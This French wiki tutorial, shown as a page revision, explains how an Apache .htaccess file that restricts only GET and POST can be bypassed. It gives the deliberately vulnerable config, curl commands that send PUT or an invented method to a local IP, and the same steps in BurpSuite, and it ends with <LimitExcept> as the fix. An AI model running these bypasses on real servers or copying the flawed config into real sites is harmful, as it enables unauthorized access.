Ci-dessous, les différences entre deux révisions de la page.
— |
web:bypass_htaccess [2016/12/01 13:09] (Version actuelle) arkinar créée |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | **BYPASS HTACCESS** | ||
+ | **1.Presentation** | ||
+ | |||
+ | Les fichiers .htaccess sont des fichiers texte de configuration des serveurs web Apache et peuvent être placés dans n'importe quel répertoire. Ils servent, entre autre, à définir les règles de redirection d'url, de réécriture d'url et, dans le cas qui nous intéresse, à définir les autorisations d'accès à certaines url ou fichiers du serveur. | ||
+ | |||
+ | {{ :web:htaccess.png?nolink |}} | ||
+ | |||
+ | **2.Exploitation** | ||
+ | |||
+ | Voici un exemple de code faillible permettant de protéger notre page index.php: | ||
+ | |||
+ | <code> | ||
+ | |||
+ | AuthName "Vous ne passerez pas !" # Message à afficher à l'utilisateur | ||
+ | AuthUserFile /home/www/secret/.htpasswd #Contient les identifiants de connexion sous la forme : superadmin:$apr1$ZdHH1.Zd$eFnICcA6UA5sQcrpFO0kX. | ||
+ | | ||
+ | <Limit GET POST> | ||
+ | require valid-user | ||
+ | </Limit> | ||
+ | |||
+ | </code> | ||
+ | |||
+ | Le but va être d'envoyer une méthode HTTP qui n'est pas inscrit dans le "limit" par exemple PUT, OPTIONS, DELETE,HEAD. | ||
+ | |||
+ | __2.1 Méthode 1 : Bypass avec Curl__ | ||
+ | |||
+ | Avec la commande curl et la méthode PUT: | ||
+ | <code> | ||
+ | curl -XPUT http://192.168.43.103/index.php | ||
+ | </code> | ||
+ | |||
+ | Avec la commande curl et une méthode inconnu: | ||
+ | <code> | ||
+ | curl -XTOTO http://192.168.43.103/index.php | ||
+ | </code> | ||
+ | |||
+ | __2.2 Méthode 2 : Bypass avec BurpSuite__ | ||
+ | |||
+ | L'outil BurpSuite permet de créer un proxy web local. | ||
+ | |||
+ | Lancez le. | ||
+ | |||
+ | Dans les paramètres réseaux de firefox configurez votre proxy comme ceci : | ||
+ | {{ :web:config_ff.png?nolink |}} | ||
+ | |||
+ | Recharger la page qui demande une authentification et vous verrez la requête apparaître dans burpsuite. | ||
+ | |||
+ | {{ :web:burpsuite1.png?nolink |}} | ||
+ | |||
+ | Modifier la méthode GET en TOTO : | ||
+ | |||
+ | {{ :web:burpsuite2.png?nolink |}} | ||
+ | |||
+ | Cliquez sur "Forward" | ||
+ | |||
+ | Dans votre navigateur firefox l'authentification demandée est bypassée. | ||
+ | |||
+ | **3.Comment se protéger** | ||
+ | |||
+ | Tout simplement en n'utilisant PAS les closes <Limit> qu'on peut voir dans le fichier .htaccess. | ||
+ | |||
+ | Si vous avez quand même besoin de limiter les méthodes d'accès, utilisez <LimitExcept> au lieu de <Limit>, ce qui générera une Exception au lieu d'autoriser l'accès. | ||
+ | |||
+ | source : [[https://www.firediy.fr/article/bypass-htaccess-contourner-un-acces-web-securise | firediy]] |